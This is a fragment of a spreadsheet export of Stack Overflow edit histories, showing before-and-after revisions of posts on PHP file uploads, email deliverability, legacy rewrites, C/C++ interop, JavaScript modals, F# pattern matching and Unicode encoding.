 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;lt;?php&lt;/span&gt;_x000D_
&lt;span class="hljs-variable"&gt;$uploaddir&lt;/span&gt; = &lt;span class="hljs-string"&gt;"/www/uploads/"&lt;/span&gt;;_x000D_
&lt;span class="hljs-variable"&gt;$uploadfile&lt;/span&gt; = &lt;span class="hljs-variable"&gt;$uploaddir&lt;/span&gt; . basename(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;[&lt;span class="hljs-string"&gt;'userfile'&lt;/span&gt;][&lt;span class="hljs-string"&gt;'name'&lt;/span&gt;]);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;'&amp;lt;pre&amp;gt;'&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (move_uploaded_file(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;[&lt;span class="hljs-string"&gt;'userfile'&lt;/span&gt;][&lt;span class="hljs-string"&gt;'tmp_name'&lt;/span&gt;], &lt;span class="hljs-variable"&gt;$uploadfile&lt;/span&gt;)) {_x000D_
    &lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Success.\n"&lt;/span&gt;;_x000D_
} &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
    &lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Failure.\n"&lt;/span&gt;;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;'Here is some more debugging info:'&lt;/span&gt;;_x000D_
print_r(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;);_x000D_
&lt;span class="hljs-keyword"&gt;print&lt;/span&gt; &lt;span class="hljs-string"&gt;"&amp;lt;/pre&amp;gt;"&lt;/span&gt;;_x000D_
&lt;span class="hljs-meta"&gt;?&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; The upload-to folder should not be located in a place that's accessible via HTTP, otherwise it would be possible to upload a PHP script and execute it upon the server.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Configuration&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; When running this setup with larger files you may receive errors. Check your &lt;code&gt;php.ini&lt;/code&gt; file for these keys:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;max_execution_time = 30&lt;/code&gt;&lt;br&gt; &lt;code&gt;upload_max_filesize = 2M&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Increasing these values as appropriate may help. When using Apache, changes to this file require a restart.&lt;/p&gt; _x000D_
 &lt;p&gt; The maximum memory permitted value (set via &lt;code&gt;memory_limit&lt;/code&gt;) does not play a role here as the file is written to the tmp directory as it is uploaded. The location of the tmp directory is optionally controlled via &lt;code&gt;upload_tmp_dir&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;HTML&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&amp;lt;form enctype=&lt;span class="hljs-string"&gt;"multipart/form-data"&lt;/span&gt; action=&lt;span class="hljs-string"&gt;"action.php"&lt;/span&gt; method=&lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;&amp;gt;_x000D_
&amp;lt;input type=&lt;span class="hljs-string"&gt;"hidden"&lt;/span&gt; name=&lt;span class="hljs-string"&gt;"MAX_FILE_SIZE"&lt;/span&gt; value=&lt;span class="hljs-string"&gt;"1000000"&lt;/span&gt; /&amp;gt;_x000D_
&amp;lt;input name=&lt;span class="hljs-string"&gt;"userfile"&lt;/span&gt; type=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; /&amp;gt; &amp;lt;input type=&lt;span class="hljs-string"&gt;"submit"&lt;/span&gt; value=&lt;span class="hljs-string"&gt;"Go"&lt;/span&gt; /&amp;gt;_x000D_
&amp;lt;/form&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;action.php&lt;/code&gt; is the name of a PHP file that will process the upload (shown below)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;MAX_FILE_SIZE&lt;/code&gt; must appear immediately before the input with type &lt;code&gt;file&lt;/code&gt;. This value can easily be manipulated on the client so should not be relied upon. It's main benefit is to provide the user with early warning that their file is too large, before they've uploaded it.&lt;/li&gt; _x000D_
  &lt;li&gt; You can change the name of the input with type &lt;code&gt;file&lt;/code&gt;, but make sure it doesn't contain any spaces. You must also update the corresponding value in the PHP file (below).&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;PHP&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-php s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;lt;?php&lt;/span&gt;_x000D_
&lt;span class="hljs-variable"&gt;$uploaddir&lt;/span&gt; = &lt;span class="hljs-string"&gt;"/www/uploads/"&lt;/span&gt;;_x000D_
&lt;span class="hljs-variable"&gt;$uploadfile&lt;/span&gt; = &lt;span class="hljs-variable"&gt;$uploaddir&lt;/span&gt; . basename(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;[&lt;span class="hljs-string"&gt;'userfile'&lt;/span&gt;][&lt;span class="hljs-string"&gt;'name'&lt;/span&gt;]);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;'&amp;lt;pre&amp;gt;'&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (move_uploaded_file(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;[&lt;span class="hljs-string"&gt;'userfile'&lt;/span&gt;][&lt;span class="hljs-string"&gt;'tmp_name'&lt;/span&gt;], &lt;span class="hljs-variable"&gt;$uploadfile&lt;/span&gt;)) {_x000D_
    &lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Success.\n"&lt;/span&gt;;_x000D_
} &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
    &lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;"Failure.\n"&lt;/span&gt;;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;echo&lt;/span&gt; &lt;span class="hljs-string"&gt;'Here is some more debugging info:'&lt;/span&gt;;_x000D_
print_r(&lt;span class="hljs-variable"&gt;$_FILES&lt;/span&gt;);_x000D_
&lt;span class="hljs-keyword"&gt;print&lt;/span&gt; &lt;span class="hljs-string"&gt;"&amp;lt;/pre&amp;gt;"&lt;/span&gt;;_x000D_
&lt;span class="hljs-meta"&gt;?&amp;gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; The upload-to folder should not be located in a place that's accessible via HTTP, otherwise it would be possible to upload a PHP script and execute it upon the server.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;code&gt;&lt;span class="diff-add"&gt;php.ini&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; Configuration&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; When running this setup with larger files you may receive errors. Check your &lt;code&gt;php.ini&lt;/code&gt; file for these keys:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;max_execution_time = 30&lt;/code&gt;&lt;br&gt; &lt;code&gt;upload_max_filesize = 2M&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Increasing these values as appropriate may help. When using Apache, changes to this file require a restart.&lt;/p&gt; _x000D_
 &lt;p&gt; The maximum memory permitted value (set via &lt;code&gt;memory_limit&lt;/code&gt;) does not play a role here as the file is written to the tmp directory as it is uploaded. The location of the tmp directory is optionally controlled via &lt;code&gt;upload_tmp_dir&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Drew Noakes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Just released an opensource&lt;/span&gt; &lt;strong&gt;&lt;a href="http://www.eclipse4sl.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Silverlight plugin&lt;/span&gt; for &lt;span class="diff-delete"&gt;Eclipse IDE&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt; check out &lt;a href="http://www.eclipse4sl.org/" rel="nofollow noreferrer"&gt;http://www.eclipse4sl.org/&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Use&lt;/span&gt; &lt;strong&gt;&lt;span class="diff-add"&gt;Eclipse&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.eclipse4sl.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Eclipse tools&lt;/span&gt; for &lt;span class="diff-add"&gt;Microsoft Silverlight&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt; check out &lt;a href="http://www.eclipse4sl.org/" rel="nofollow noreferrer"&gt;http://www.eclipse4sl.org/&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jobi Joy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To my experience, when email providers check for spams, they check 5 main things other than content: (When I say domain, I'm referring to the domain of the sender's email address.)&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; "A" record (IP) of the domain name exists&lt;/li&gt; _x000D_
  &lt;li&gt; MX records of the domain name exist&lt;/li&gt; _x000D_
  &lt;li&gt; PTR record (Reverse lookup) of the sender's IP address exists (Sometimes, I think it is also checked to see if the PTR record has the same A record as the original domain)&lt;/li&gt; _x000D_
  &lt;li&gt; SPF record of that domain matches the IP number (This is a list of IP numbers allowed to send emails of that domain. Although this would be a great solution for spam filtering, this is not an official record, so it is not always checked. &lt;a href="https://www.unlocktheinbox.com/spfwizard/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Check out the SPF setup wizard.&lt;/span&gt;&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; The IP segment of the server is not a blacklisted segment.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; The fifth one is the one that was a problem for me. Apparently email providers such as Hotmail, Gmail, Yahoo drop all incoming email from widely used server providers such as Amazon EC2. In that case, there's simply no way to guarantee the delivery of all outgoing emails, so you would have to relay all outgoing email from some other SMTP server outside the blacklisted segment. The easiest way to do this is configuring Postfix (or whatever MTA you're using) to automatically relay all emails. You can find plenty of articles on this if you do some googling.&lt;/p&gt; _x000D_
 &lt;p&gt; If that is not the case, then all you need is a simple MTA like Postfix, as long as all the necessary DNS records listed above are configured properly, you should have no trouble sending emails.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To my experience, when email providers check for spams, they check 5 main things other than content: (When I say domain, I'm referring to the domain of the sender's email address.)&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; "A" record (IP) of the domain name exists&lt;/li&gt; _x000D_
  &lt;li&gt; MX records of the domain name exist&lt;/li&gt; _x000D_
  &lt;li&gt; PTR record (Reverse lookup) of the sender's IP address exists (Sometimes, I think it is also checked to see if the PTR record has the same A record as the original domain)&lt;/li&gt; _x000D_
  &lt;li&gt; SPF record of that domain matches the IP number (This is a list of IP numbers allowed to send emails of that domain. Although this would be a great solution for spam filtering, this is not an official record, so it is not always checked. &lt;a href="http://old.openspf.org/wizard.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Check out the SPF setup wizard.&lt;/span&gt;&lt;/a&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt; The IP segment of the server is not a blacklisted segment.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; The fifth one is the one that was a problem for me. Apparently email providers such as Hotmail, Gmail, Yahoo drop all incoming email from widely used server providers such as Amazon EC2. In that case, there's simply no way to guarantee the delivery of all outgoing emails, so you would have to relay all outgoing email from some other SMTP server outside the blacklisted segment. The easiest way to do this is configuring Postfix (or whatever MTA you're using) to automatically relay all emails. You can find plenty of articles on this if you do some googling.&lt;/p&gt; _x000D_
 &lt;p&gt; If that is not the case, then all you need is a simple MTA like Postfix, as long as all the necessary DNS records listed above are configured properly, you should have no trouble sending emails.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In terms of business value, I would think it's extremely rare that a real case can be made for a rewrite due solely to the internal state of the code. If the product's customer-facing and is currently live and bringing in money (i.e. is not a mothballed or unreleased product), then consider that:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; You already have &lt;span class="diff-delete"&gt;customers&lt;/span&gt; using it. They're familiar with it, and might have built some of their own assets around it. (Other systems that interface to it; products based on it; processes they'd have to change; staff they'd maybe have to retrain). All of this costs the customer money.&lt;/li&gt; _x000D_
  &lt;li&gt; Re-writing it &lt;em&gt;might&lt;/em&gt; cost less in the long term than making difficult changes and fixes. But you can't quantify that yet, unless your app is no more complex than Hello World. And a re-write means a re-test and a redeploy, and probably an upgrade path for your customers.&lt;/li&gt; _x000D_
  &lt;li&gt; Who says the re-write will be any better? Can you honestly say your firm is writing sparkly code now? Have the practices that turned the original code to spaghetti been corrected? (Even if the main culprit was a single developer, where were his peers and management, ensuring quality through reviews, testing, etc.?)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In terms of technical reasons, I'd suggest it could be time for a major rewrite if the original has some technical dependencies that have become problematic. e.g. a third party dependency that's now out of support, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; In general though, I think the most sensible move is to refactor piece by piece (very small pieces if it's really &lt;em&gt;that&lt;/em&gt; bad), and improve the internal architecture incrementally rather than in one big drop.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In terms of business value, I would think it's extremely rare that a real case can be made for a rewrite due solely to the internal state of the code. If the product's customer-facing and is currently live and bringing in money (i.e. is not a mothballed or unreleased product), then consider that:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; You already have &lt;span class="diff-add"&gt;customer&lt;/span&gt; using it. They're familiar with it, and might have built some of their own assets around it. (Other systems that interface to it; products based on it; processes they'd have to change; staff they'd maybe have to retrain). All of this costs the customer money.&lt;/li&gt; _x000D_
  &lt;li&gt; Re-writing it &lt;em&gt;might&lt;/em&gt; cost less in the long term than making difficult changes and fixes. But you can't quantify that yet, unless your app is no more complex than Hello World. And a re-write means a re-test and a redeploy, and probably an upgrade path for your customers.&lt;/li&gt; _x000D_
  &lt;li&gt; Who says the re-write will be any better? Can you honestly say your firm is writing sparkly code now? Have the practices that turned the original code to spaghetti been corrected? (Even if the main culprit was a single developer, where were his peers and management, ensuring quality through reviews, testing, etc.?)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In terms of technical reasons, I'd suggest it could be time for a major rewrite if the original has some technical dependencies that have become problematic. e.g. a third party dependency that's now out of support, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; In general though, I think the most sensible move is to refactor piece by piece (very small pieces if it's really &lt;em&gt;that&lt;/em&gt; bad), and improve the internal architecture incrementally rather than in one big drop.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>razlebe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a C++ library that provides various classes for managing data. I have the source code for the library.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to extend the C++ API to support C function calls so that the library can be used with C code and C++ code at the same time.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm using GNU tool chain (gcc, glibc, etc), so language and architecture support are not an issue.&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any reasons why this is &lt;strong&gt;technically&lt;/strong&gt; not possible?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any &lt;strong&gt;gotcha's&lt;/strong&gt; that I need to watch out for?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there resources, example code and/or documentation available regarding this?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; _x000D_
 &lt;p&gt; Some other things that I have found out:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Use the following to wrap your C++ headers that need to be used by C code.&lt;/li&gt; _x000D_
 &lt;/ol&gt; #ifdef __cplusplus extern "C" { #endif // // Code goes here ... // #ifdef __cplusplus } // extern "C" #endif _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Keep "real" C++ interfaces in separate header files that are not included by C. Think &lt;a href="http://en.wikipedia.org/wiki/Private_class_data_pattern" rel="nofollow noreferrer"&gt;PIMPL principle&lt;/a&gt; here. Using &lt;code&gt;#ifndef __cplusplus #error&lt;/code&gt; stuff helps here to detect any craziness.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Careful of C++ identifiers as names in C code&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Enums varying in size between C and C++ compilers. Probably not an issue if you're using GNU tool chain, but still, be careful.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; For structs follow the following form so that C does not get confused.&lt;/p&gt; &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; typedef struct X { ... } X_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Then use pointers for passing around C++ objects, they just have to be declared in C as struct X where X is the C++ object.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; All of this is courtesy of a friend who's a wizard at C++.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a C++ library that provides various classes for managing data. I have the source code for the library.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to extend the C++ API to support C function calls so that the library can be used with C code and C++ code at the same time.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm using GNU tool chain (gcc, glibc, etc), so language and architecture support are not an issue.&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any reasons why this is &lt;strong&gt;technically&lt;/strong&gt; not possible?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any &lt;strong&gt;gotcha's&lt;/strong&gt; that I need to watch out for?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there resources, example code and/or documentation available regarding this?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;:UPDATE:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Some other things that I have found out:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Use the following to wrap your C++ headers that need to be used by C code.&lt;/li&gt; _x000D_
 &lt;/ol&gt; #ifdef __cplusplus extern "C" { #endif // // Code goes here ... // #ifdef __cplusplus } // extern "C" #endif _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Keep "real" C++ interfaces in separate header files that are not included by C. Think &lt;a href="http://en.wikipedia.org/wiki/Private_class_data_pattern" rel="nofollow noreferrer"&gt;PIMPL principle&lt;/a&gt; here. Using &lt;code&gt;#ifndef __cplusplus #error&lt;/code&gt; stuff helps here to detect any craziness.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Careful of C++ identifiers as names in C code&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Enums varying in size between C and C++ compilers. Probably not an issue if you're using GNU tool chain, but still, be careful.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; For structs follow the following form so that C does not get confused.&lt;/p&gt; &lt;p&gt;&lt;span class="diff-add"&gt; typedef struct X { ... } X&lt;/span&gt;&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Then use pointers for passing around C++ objects, they just have to be declared in C as struct X where X is the C++ object.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; All of this is courtesy of a friend who's a wizard at C++.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Misha M</t>
  </si>
  <si>
    <t>Niall</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Floating containers, panels and dialogs:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; For dialog boxes and windows, perhaps a &lt;a href="http://developer.yahoo.com/yui/container/module/" rel="nofollow noreferrer"&gt;&lt;strong&gt;YUI module&lt;/strong&gt;&lt;/a&gt; would be an easy solution.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Modal Boxes&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you &lt;strong&gt;aren't a javascript programmer&lt;/strong&gt;, jQuery might be a practical option. There are jQuery &lt;strong&gt;plugins&lt;/strong&gt; &lt;a href="http://leandrovieira.com/projects/jquery/lightbox/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;offering&lt;/span&gt;&lt;/a&gt; the &lt;a href="http://jquery.com/demo/thickbox/" rel="nofollow noreferrer"&gt;&lt;strong&gt;modal lightbox effect&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Sidenote:&lt;/strong&gt; There are many libraries offering this kind of functionality, but if the box itself is the only piece you need, keep in consideration that &lt;strong&gt;some libraries will include many things you aren't using&lt;/strong&gt;. If you're careful to use only the packages you need, you can keep your page nice and lean.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Sidenote:&lt;/strong&gt; If you're fairly well-versed with javascript, or wish to become so, remember that you can always &lt;em&gt;write your own&lt;/em&gt;. It's common for people in the javascript world to turn straight to libraries. Libraries are an important part of the modern javascript landscape, but sometimes they become a crutch for developers. Writing a few front-end pieces yourself is a great way to dive into front-end development.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Floating containers, panels and dialogs:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; For dialog boxes and windows, perhaps a &lt;a href="http://developer.yahoo.com/yui/container/module/" rel="nofollow noreferrer"&gt;&lt;strong&gt;YUI module&lt;/strong&gt;&lt;/a&gt; would be an easy solution.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Modal Boxes&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you &lt;strong&gt;aren't a javascript programmer&lt;/strong&gt;, jQuery might be a practical option. There are jQuery &lt;strong&gt;plugins&lt;/strong&gt; &lt;a href="http://leandrovieira.com/projects/jquery/lightbox/" rel="nofollow noreferrer"&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;offering&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt; the &lt;a href="http://jquery.com/demo/thickbox/" rel="nofollow noreferrer"&gt;&lt;strong&gt;modal lightbox effect&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Sidenote:&lt;/strong&gt; There are many libraries offering this kind of functionality, but if the box itself is the only piece you need, keep in consideration that &lt;strong&gt;some libraries will include many things you aren't using&lt;/strong&gt;. If you're careful to use only the packages you need, you can keep your page nice and lean.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Sidenote:&lt;/strong&gt; If you're fairly well-versed with javascript, or wish to become so, remember that you can always &lt;em&gt;write your own&lt;/em&gt;. It's common for people in the javascript world to turn straight to libraries. Libraries are an important part of the modern javascript landscape, but sometimes they become a crutch for developers. Writing a few front-end pieces yourself is a great way to dive into front-end development.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>keparo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have been trying to explain the difference between switch statements and pattern matching(F#) to a couple of people but I haven't really been able to explain it well..most of the time they just look at me and say "so why don't you just use if..then..else".&lt;/p&gt; _x000D_
 &lt;p&gt; How would you explain it to them?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have been trying to explain the difference between switch statements and pattern matching(F#) to a couple of people but I haven't really been able to explain it well..most of the time they just look at me and say "so why don't you just use if..then..else".&lt;/p&gt; _x000D_
 &lt;p&gt; How would you explain it to them?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT! Thanks everyone for the great answers, I really wish I could mark multiple right answers.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nathan W</t>
  </si>
  <si>
    <t>Bruno De Fraine</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would suggest:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; For representation in code, &lt;code&gt;wchar_t&lt;/code&gt; &lt;span class="diff-delete"&gt; or&lt;/span&gt; equivalent&lt;span class="diff-delete"&gt; using (UTF-16)&lt;/span&gt;.&lt;/li&gt; _x000D_
  &lt;li&gt; For storage representation, UTF-8.&lt;/li&gt; _x000D_
  &lt;li&gt; For wire representation, UTF-8.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The advantage of UTF-8 in storage and wire situations is that machine endianness is not a factor. The advantage of using a fixed size character such as &lt;code&gt;wchar_t&lt;/code&gt; in code is that you can easily find out the length of a string without having to scan it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would suggest:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; For representation in code, &lt;code&gt;wchar_t&lt;/code&gt; &lt;span class="diff-add"&gt;or&lt;/span&gt; equivalent.&lt;/li&gt; _x000D_
  &lt;li&gt; For storage representation, UTF-8.&lt;/li&gt; _x000D_
  &lt;li&gt; For wire representation, UTF-8.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The advantage of UTF-8 in storage and wire situations is that machine endianness is not a factor. The advantage of using a fixed size character such as &lt;code&gt;wchar_t&lt;/code&gt; in code is that you can easily find out the length of a string without having to scan it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Patterns give you a small language to describe the structure of the values you want to match. The structure can be arbitrarily deep and you can bind variables to parts of the structured value.&lt;/p&gt; _x000D_
 &lt;p&gt; This allows you to write things extremely succinctly. You can illustrate this with a small example, such as a derivative function for a simple type of mathematical expressions:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;type expr =_x000D_
    | Int of int_x000D_
    | Var of string_x000D_
    | Add of expr &lt;span class="diff-delete"&gt;+&lt;/span&gt; expr_x000D_
    | Mul of expr * expr;;_x000D_
_x000D_
let rec d(f, x) =_x000D_
    match f with_x000D_
    | Var y when x=y -&amp;gt; Int 1_x000D_
    | Int _ | Var _ -&amp;gt; Int 0_x000D_
    | Add(f, g) -&amp;gt; Add(d(f, x), d(g, x))_x000D_
    | Mul(f, g) -&amp;gt; Add(Mul(f, d(g, x)), Mul(g, d(f, x)));;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Additionally, because pattern matching is a static construct for static types, the compiler can (i) verify that you covered all cases (ii) detect redundant branches that can never match any value (iii) provide a very efficient implementation (with jumps etc.).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
